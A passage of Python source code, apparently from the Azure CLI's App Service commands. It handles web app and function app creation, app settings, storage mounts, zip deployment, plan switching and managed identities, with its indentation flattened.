if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise ArgumentUsageError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
match = helper.resolve(runtime, is_linux)
if not match:
raise ValidationError("Linux Runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
helper.get_site_config_setter(match, linux=is_linux)(cmd=cmd, stack=match, site_config=site_config)
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
if deployment_container_image_name:
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
# set the needed app settings for container image validation
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
value=docker_registry_server_user))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
value=docker_registry_server_password))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
value=docker_registry_server_url))
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise ArgumentUsageError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime, linux=is_linux)
if not match:
raise ValidationError("Windows runtime '{}' is not supported. "
"Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
helper.get_site_config_setter(match, linux=is_linux)(cmd=cmd, stack=match, site_config=site_config)
# TODO: Ask Calvin the purpose of this - seems like unneeded set of calls
# portal uses the current_stack propety in metadata to display stack for windows apps
current_stack = get_current_stack_from_runtime(runtime)
else: # windows webapp without runtime specified
if name_validation.name_available: # If creating new webapp
node_default_version = helper.get_default_version("node", is_linux, get_windows_config_version=True)
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
if name_validation.name_available:
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'
.format(name)))
poller = client.web_apps.begin_create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
if current_stack:
_update_webapp_current_stack_property_if_needed(cmd, resource_group_name, name, current_stack)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
logger.info("Updating container settings")
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
webapp.identity = identity
return webapp
def _validate_vnet_integration_location(cmd, subnet_resource_group, vnet_name, webapp_location, vnet_sub_id=None):
from azure.cli.core.commands.client_factory import get_subscription_id
current_sub_id = get_subscription_id(cmd.cli_ctx)
if vnet_sub_id:
cmd.cli_ctx.data['subscription_id'] = vnet_sub_id
vnet_client = network_client_factory(cmd.cli_ctx).virtual_networks
vnet_location = vnet_client.get(resource_group_name=subnet_resource_group,
virtual_network_name=vnet_name).location
cmd.cli_ctx.data['subscription_id'] = current_sub_id
vnet_location = _normalize_location(cmd, vnet_location)
asp_location = _normalize_location(cmd, webapp_location)
if vnet_location != asp_location:
raise ArgumentUsageError("Unable to create webapp: vnet and App Service Plan must be in the same location. "
"vnet location: {}. Plan location: {}.".format(vnet_location, asp_location))
def _get_subnet_info(cmd, resource_group_name, vnet, subnet):
from azure.cli.core.commands.client_factory import get_subscription_id
subnet_info = {"vnet_name": None,
"subnet_name": None,
"resource_group_name": None,
"subnet_resource_id": None,
"subnet_subscription_id": None,
"vnet_resource_id": None}
if is_valid_resource_id(subnet):
if vnet:
logger.warning("--subnet argument is a resource ID. Ignoring --vnet argument.")
parsed_sub_rid = parse_resource_id(subnet)
subnet_info["vnet_name"] = parsed_sub_rid["name"]
subnet_info["subnet_name"] = parsed_sub_rid["resource_name"]
subnet_info["resource_group_name"] = parsed_sub_rid["resource_group"]
subnet_info["subnet_resource_id"] = subnet
subnet_info["subnet_subscription_id"] = parsed_sub_rid["subscription"]
vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}"
subnet_info["vnet_resource_id"] = vnet_fmt.format(parsed_sub_rid["subscription"],
parsed_sub_rid["resource_group"],
parsed_sub_rid["name"])
return subnet_info
subnet_name = subnet
if is_valid_resource_id(vnet):
parsed_vnet = parse_resource_id(vnet)
subnet_rg = parsed_vnet["resource_group"]
vnet_name = parsed_vnet["name"]
subscription_id = parsed_vnet["subscription"]
subnet_info["vnet_resource_id"] = vnet
else:
logger.warning("Assuming subnet resource group is the same as webapp. "
"Use a resource ID for --subnet or --vnet to use a different resource group.")
subnet_rg = resource_group_name
vnet_name = vnet
subscription_id = get_subscription_id(cmd.cli_ctx)
vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}"
subnet_info["vnet_resource_id"] = vnet_fmt.format(subscription_id,
subnet_rg,
vnet)
subnet_id_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}/subnets/{}"
subnet_rid = subnet_id_fmt.format(subscription_id, subnet_rg, vnet_name, subnet_name)
subnet_info["vnet_name"] = vnet_name
subnet_info["subnet_name"] = subnet_name
subnet_info["resource_group_name"] = subnet_rg
subnet_info["subnet_resource_id"] = subnet_rid
subnet_info["subnet_subscription_id"] = subscription_id
return subnet_info
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one out the combinations
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
non_url = "/" not in deployment_container_image_name
non_url = non_url or ("." not in deployment_container_image_name and ":" not in deployment_container_image_name)
if non_url:
return None
parsed_url = urlparse(deployment_container_image_name)
if parsed_url.scheme:
return parsed_url.hostname
hostname = urlparse("https://{}".format(deployment_container_image_name)).hostname
return "https://{}".format(hostname)
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise MutuallyExclusiveArgumentError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest, setting_type in [(settings, result, "Settings"), (slot_settings, slot_result, "SlotSettings")]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command
for t in temp:
if 'slotSetting' in t.keys():
slot_result[t['name']] = t['slotSetting']
if setting_type == "SlotSettings":
slot_result[t['name']] = True
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(dest)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
# Slot settings logic to add a new setting(s) or remove an existing setting(s)
for slot_setting_name, value in slot_result.items():
if value and slot_setting_name not in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.append(slot_setting_name)
elif not value and slot_setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(slot_setting_name)
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise ValidationError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise ResourceNotFoundError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise ResourceNotFoundError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because sometimes if the plan is created as part of function app,
# it can take a couple of tries before it gets the plan
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote and app.reserved:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
elif app.reserved:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise ResourceNotFoundError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
headers['x-ms-client-request-id'] = cmd.cli_ctx.data['headers']['x-ms-client-request-id']
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check the status of async deployment
if res.status_code == 202:
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
# check if there's an ongoing process
if res.status_code == 409:
raise UnclassifiedUserFault("There may be an ongoing deployment or your app setting has "
"WEBSITE_RUN_FROM_PACKAGE. Please track your deployment in {} and ensure the "
"WEBSITE_RUN_FROM_PACKAGE app setting is removed. Use 'az webapp config "
"appsettings list --name MyWebapp --resource-group MyResourceGroup --subscription "
"MySubscription' to list app settings and 'az webapp config appsettings delete "
"--name MyWebApp --resource-group MyResourceGroup --setting-names <setting-names> "
"to delete them.".format(deployment_status_url))
# check if an error occured during deployment
if res.status_code:
raise AzureInternalError("An error occured during deployment. Status Code: {}, Details: {}"
.format(res.status_code, res.text))
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise ResourceNotFoundError('Could not find a \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current) / float(total))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.utcnow()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting], slot=slot)
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ex:
# This SDK function throws an error if Status Code is 200
if ex.status_code != 200:
raise ex
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code != 200:
raise ex
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None, # pylint: disable=unused-argument
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs): # pylint: disable=unused-argument
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.begin_create_or_update_slot if slot else client.web_apps.begin_create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(cmd, instance, client_affinity_enabled=None, https_only=None, minimum_elastic_instance_count=None,
prewarmed_instance_count=None):
if 'function' in instance.kind:
raise ValidationError("please use 'az functionapp update' to update this function app")
if minimum_elastic_instance_count or prewarmed_instance_count:
args = ["--minimum-elastic-instance-count", "--prewarmed-instance-count"]
plan = get_app_service_plan_from_webapp(cmd, instance)
sku = _normalize_sku(plan.sku.name)
if get_sku_tier(sku) not in ["PREMIUMV2", "PREMIUMV3"]:
raise ValidationError("{} are only supported for elastic premium V2/V3 SKUs".format(str(args)))
if not plan.elastic_scale_enabled:
raise ValidationError("Elastic scale is not enabled on the App Service Plan. Please update the plan ")
if (minimum_elastic_instance_count or 0) > plan.maximum_elastic_worker_count:
raise ValidationError("--minimum-elastic-instance-count: Minimum elastic instance count is greater than "
"the app service plan's maximum Elastic worker count. "
"Please choose a lower count or update the plan's maximum ")
if (prewarmed_instance_count or 0) > plan.maximum_elastic_worker_count:
raise ValidationError("--prewarmed-instance-count: Prewarmed instance count is greater than "
"the app service plan's maximum Elastic worker count. "
"Please choose a lower count or update the plan's maximum ")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
if minimum_elastic_instance_count is not None:
from azure.mgmt.web.models import SiteConfig
# Need to create a new SiteConfig object to ensure that the new property is included in request body
conf = SiteConfig(**instance.site_config.as_dict())
conf.minimum_elastic_instance_count = minimum_elastic_instance_count
instance.site_config = conf
if prewarmed_instance_count is not None:
instance.site_config.pre_warmed_instance_count = prewarmed_instance_count
return instance
def update_functionapp(cmd, instance, plan=None, force=False):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info, force)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance, force):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise ResourceNotFoundError('Could not determine the current plan of the functionapp')
# Ensure all plans involved are windows. Reserved = true indicates Linux.
if src_plan_info.reserved or dest_plan_instance.reserved:
raise ValidationError('This feature currently supports windows to windows plan migrations. For other '
'migrations, please redeploy.')
src_is_premium = is_plan_elastic_premium(cmd, src_plan_info)
dest_is_consumption = is_plan_consumption(cmd, dest_plan_instance)
if not (is_plan_consumption(cmd, src_plan_info) or src_is_premium):
raise ValidationError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
if not (dest_is_consumption or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise ValidationError('You are trying to move to a plan that is not a Consumption or an '
'Elastic Premium plan. ' +
general_switch_msg)
if src_is_premium and dest_is_consumption:
logger.warning('WARNING: Moving a functionapp from Premium to Consumption might result in loss of '
'functionality and cause the app to break. Please ensure the functionapp is compatible '
'with a Consumption plan and is not using any features only available in Premium.')
if not force:
raise RequiredArgumentMissingError('If you want to migrate a functionapp from a Premium to Consumption '
'plan, please re-run this command with the \'--force\' flag.')
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.begin_create_or_update(resource_group_name, name, site_envelope=instance)
def get_functionapp(cmd, resource_group_name, name, slot=None):
function_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not function_app or 'function' not in function_app.kind:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return function_app
def list_webapp(cmd, resource_group_name=None):
full_list = _list_app(cmd.cli_ctx, resource_group_name)
# ignore apps with kind==null & not functions apps
return list(filter(lambda x: x.kind is not None and "function" not in x.kind.lower(), full_list))
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_restore_from_deleted_app',
slot, request)
def list_function_app(cmd, resource_group_name=None):
return list(filter(lambda x: x.kind is not None and "function" in x.kind.lower(),
_list_app(cmd.cli_ctx, resource_group_name)))
def show_app(cmd, resource_group_name, name, slot=None):
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not app:
raise ResourceNotFoundError("Unable to find resource'{}', in ResourceGroup '{}'.".format(name,
resource_group_name))
app.site_config = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration',
slot)
_rename_server_farm_props(app)
_fill_ftp_publishing_url(cmd, app, resource_group_name, name, slot)
return app
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = []
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def _build_identities_info(identities):
from ._appservice_utils import MSI_LOCAL_ID
identities = identities or []
identity_types = []
if not identities or MSI_LOCAL_ID in identities:
identity_types.append('SystemAssigned')
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities:
identity_types.append('UserAssigned')
identity_types = ','.join(identity_types)
info = {'type': identity_types}
if external_identities:
info['userAssignedIdentities'] = {e: {} for e in external_identities}
return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
'ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('UserAssignedIdentity')
_, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_types = ResourceIdentityType.user_assigned
else:
identity_types = ResourceIdentityType.system_assigned
if webapp.identity:
webapp.identity.type = identity_types
else:
webapp.identity = ManagedServiceIdentity(type=identity_types)
if external_identities:
if not webapp.identity.user_assigned_identities:
webapp.identity.user_assigned_identities = {}
for identity in external_identities:
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update',
extra_parameter=webapp, slot=slot)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, identity_role=role, identity_scope=scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
web_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not web_app:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return web_app.identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
IdentityType = cmd.get_models('ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('UserAssignedIdentity')
_, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity is None:
return webapp
to_remove = []
existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
if external_identities:
to_remove = {x.lower() for x in external_identities}
non_existing = to_remove.difference(existing_identities)
if non_existing:
raise ResourceNotFoundError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
if not list(existing_identities - to_remove):
if webapp.identity.type == IdentityType.user_assigned:
webapp.identity.type = IdentityType.none
elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
webapp.identity.type = IdentityType.system_assigned
webapp.identity.user_assigned_identities = None
if remove_local_identity:
webapp.identity.type = (IdentityType.none
if webapp.identity.type == IdentityType.system_assigned or
webapp.identity.type == IdentityType.none
else IdentityType.user_assigned)
